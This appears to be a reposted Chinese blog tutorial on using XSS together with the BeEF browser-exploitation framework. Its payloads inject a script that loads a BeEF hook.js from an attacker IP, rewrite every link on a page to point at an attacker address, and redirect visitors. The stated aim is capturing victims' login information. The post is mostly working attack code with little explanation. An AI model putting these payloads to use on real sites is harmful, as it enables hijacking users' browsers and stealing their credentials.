xss与beef

Posted 2020-12-17 f1veseven

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了xss与beef相关的知识，希望对你有一定的参考价值。

启动beef和apache

技术图片

修改主页，在网页中添加

<script src=‘http://IP:3000/hook.js‘></script>

xss漏洞利用

篡改网页a标签中的连接

<script>
window.onload = function(){
var link = document.getElementsByTagName("a");
for(j = 0; j < link.length; j++){
link[j].href = "http://IP";}
}
</script>

跳转到目标网页

<script>window.location=‘http://ip</script>

目标登录网页获取信息

技术图片

以上是关于xss与beef的主要内容，如果未能解决你的问题，请参考以下文章

苹果系统怎么安装beef xss

Mitmf中间人攻击框架与beef结合，XSS一把

xss利用——BeEF#stage3（绕过同源策略与浏览器代理）

Kali Linux之速会BEEF & XSS攻击

XSS-beef使用

xss利用之kali神器beef